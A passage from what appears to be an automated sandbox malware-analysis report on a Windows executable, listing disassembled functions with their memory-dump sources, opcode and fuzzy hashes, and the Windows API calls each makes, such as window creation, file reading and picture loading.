                                                                                                                  • Instruction Fuzzy Hash: EAE04631200208DFCB02DF05EC05E8637A6FB0C714F024094FA01672B1C731AC60EF80
                                                                                                                  Function 00E4F5DA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00E4F5FF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  • Opcode ID: 0200bc6d8a35767da7688a5abf23280444a048e0bbc3365ce649b394140e164a
                                                                                                                  • Instruction ID: 93cc7d15e34d9a6e9b6b113410c5ef3f5f1d4155a32c6e2ef3c4e460b679d6c1
                                                                                                                  • Opcode Fuzzy Hash: 0200bc6d8a35767da7688a5abf23280444a048e0bbc3365ce649b394140e164a
                                                                                                                  • Instruction Fuzzy Hash: 8FE0E234204248EFCB01DF85EC44E863BA5EB5A350F050094FD058B262C772A864EBA1
                                                                                                                  Function 00E4F5AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00E4F5D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  • Opcode ID: 52d1d727fbe7c33eec5a9cd8caf85e23583812dd27d7939cd5788b9b51dcb291
                                                                                                                  • Instruction ID: a448a724838a264215b3ef268ddd8fa35ba66a41497d3fe91c130a709ae1053e
                                                                                                                  • Opcode Fuzzy Hash: 52d1d727fbe7c33eec5a9cd8caf85e23583812dd27d7939cd5788b9b51dcb291
                                                                                                                  • Instruction Fuzzy Hash: F3E0E234204248EFCB01DF85EC44E863BA5EB5A350F050094FD059B261C771A820DB61
                                                                                                                  Function 00DFB715 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                    • Part of subcall function 00DFB73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DFB72B), ref: 00DFB7F6
                                                                                                                    • Part of subcall function 00DFB73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00DFB72B,00000000,?,?,00DFB2EF,?,?), ref: 00DFB88D
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00DFB2EF,?,?), ref: 00DFB734
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2797419724-0
                                                                                                                  • Opcode ID: d1c44346cf67b54f20a8f40c70ad1cf73f3bd8c39f9ac9b5a2bfa5803fa310ac
                                                                                                                  • Instruction ID: 875491d23e781a307ed2f9feb43b82e7fe2d5a52dbbc9d8e363882b84034142d
                                                                                                                  • Opcode Fuzzy Hash: d1c44346cf67b54f20a8f40c70ad1cf73f3bd8c39f9ac9b5a2bfa5803fa310ac
                                                                                                                  • Instruction Fuzzy Hash: 59D0123068430CBBDB103B51DD07F593A5EDB94760F548011B7057D1E1CBB165505575
                                                                                                                  Function 00E5B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NameUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2645101109-0
                                                                                                                  • Opcode ID: 81e2048e8285291d92d7a09f1ca2f2126056e96525ca690adec86e35a255b2e5
                                                                                                                  • Instruction ID: 811a34cc850e0adb0cb8d5a6ddce6fc0e0c45a48c8b6156b68352a39c5ce531f
                                                                                                                  • Opcode Fuzzy Hash: 81e2048e8285291d92d7a09f1ca2f2126056e96525ca690adec86e35a255b2e5
                                                                                                                  • Instruction Fuzzy Hash: 54C04CB1804109DFC751CBC0DD489EFB7BCAB04301F1451A1D205F1110D7709B499B72
                                                                                                                  Function 00E08189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E0818F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: 895e9ce47f2fb1ffa6b2a4af53c9dbd5c4ae6d46018bd8d762a9551e1c4bde3f
                                                                                                                  • Instruction ID: 6673641fabe28bce85d803f50c89fa2d462194c268b30fb82e59cda775c1692a
                                                                                                                  • Opcode Fuzzy Hash: 895e9ce47f2fb1ffa6b2a4af53c9dbd5c4ae6d46018bd8d762a9551e1c4bde3f
                                                                                                                  • Instruction Fuzzy Hash: 7EA0113008820CAB8F002B83FC0888A3F2CEB002A0B800020F80C002208BA2A8208A82
                                                                                                                  Function 00DEE3B0 Relevance: .5, Instructions: 540COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2dcf35a14e1db201c69c601a4eb03d7c4eea809e20864ffc5f28eb9e66322de9
                                                                                                                  • Instruction ID: c69fc5057d8ea878d0de5c8c1064ff4d213006ce13ea7661c5d85bb9959e9d71
                                                                                                                  • Opcode Fuzzy Hash: 2dcf35a14e1db201c69c601a4eb03d7c4eea809e20864ffc5f28eb9e66322de9
                                                                                                                  • Instruction Fuzzy Hash: EF22BF70904259CFDB24EF59D480ABEB7F1FF58304F188469E98AAB351E331E945CBA1
                                                                                                                  Function 00DE93F0 Relevance: .5, Instructions: 531COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5c5042217a3accfdcbb6a7475aa0f78f47a388aa957b24a5aefd68b61f337523
                                                                                                                  • Instruction ID: a10bdd42c34a9d610822b9224be5a7f052f5401c1ab1bdc9767379a6c3872c09
                                                                                                                  • Opcode Fuzzy Hash: 5c5042217a3accfdcbb6a7475aa0f78f47a388aa957b24a5aefd68b61f337523
                                                                                                                  • Instruction Fuzzy Hash: DE127E70A002499FDF04EFA5D991AAEB7F5FF48300F10852AE946F7290EB35A915CB64
                                                                                                                  Function 00DEAF50 Relevance: .5, Instructions: 514COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3728558374-0
                                                                                                                  • Opcode ID: b8c9702ff30c085135096a0ac5d8223ea16bf411adc67cd80aa71fed34c4fbbb
                                                                                                                  • Instruction ID: eacb6e03fcd7023aa2312fd7151ee97843888cb49eaadcbc8b02d00076f16ad4
                                                                                                                  • Opcode Fuzzy Hash: b8c9702ff30c085135096a0ac5d8223ea16bf411adc67cd80aa71fed34c4fbbb
                                                                                                                  • Instruction Fuzzy Hash: B502D470A00209DFCF04EF69D9816AEB7B5FF45310F14C46AE906EB255EB31EA15CBA1
                                                                                                                  Function 00E002A4 Relevance: .3, Instructions: 345COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                  • Instruction ID: 76d9d67209d2740eb171e78b65df8f251952c86966c2bae7afc5441061337503
                                                                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                  • Instruction Fuzzy Hash: B6C1D2322051970ADF2D473A843453EBBA15EA2BB571E276DE8B3DB4D1EF20C5B4D620
                                                                                                                  Function 00E006D9 Relevance: .3, Instructions: 341COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                  • Instruction ID: 47a30448b567cabbed28f10b6bc80e58a0c61f9dd19eb77368b6f56f2d8cda7b
                                                                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                  • Instruction Fuzzy Hash: A6C1F2322051970ADF2D463AC43463EBAA15EA2BB570F636DE4B3DB0D5EF20C5B4D620
                                                                                                                  Function 00DFFA57 Relevance: .3, Instructions: 323COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                  • Instruction ID: cb948d3169fa952485451e08acf8a326c5b4d30975ef5c1a6909d1415e3d9aec
                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                  • Instruction Fuzzy Hash: C9C18F3220509B09DB2D473A847443EBAA15EA2BB131F877DE9B2CB5D5EE20C574D630
                                                                                                                  Function 010BB8C0 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                  • Instruction ID: 00f32b9e56f9b2fc02c78271d89ac2c7ae64e2ec014b34792e6c155bd9d2554c
                                                                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                  • Instruction Fuzzy Hash: C641C071D1051CEBCF48CFADC991AEEBBF2AF88201F548299D556AB345D730AB41DB80
                                                                                                                  Function 010BB7B0 Relevance: .0, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                  • Instruction ID: 9e0bc4200bb7cc226fe635c66edf5f44805276de88130255479ff9ea9605ec73
                                                                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                  • Instruction Fuzzy Hash: A3018078A00109EFCB44DF98C5909AEF7F5FB48210B208599D959A7701D730AE41DB80
                                                                                                                  Function 010BB750 Relevance: .0, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                  • Instruction ID: bb0d65006d4800dd0286d50ace2848c235eb1519288841af9ba4dea66bc398bd
                                                                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                  • Instruction Fuzzy Hash: 67019278A00109EFCB84DF98C5909AEF7F5FB48310F2485D9D859A7301D730AE41DB80
                                                                                                                  Function 010BA100 Relevance: .0, Instructions: 6COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                  Function 00E3A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E3A2FE
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E3A310
                                                                                                                  • DestroyWindow.USER32 ref: 00E3A31E
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E3A338
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E3A33F
                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E3A480
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E3A490
                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A4D8
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00E3A4E4
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E3A51E
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A540
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A553
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A55E
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00E3A567
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A576
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E3A57F
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A586
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00E3A591
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00E3A5A3
                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E6D9BC,00000000), ref: 00E3A5B9
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00E3A5C9
                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E3A5EF
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E3A60E
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A630
                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A81D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
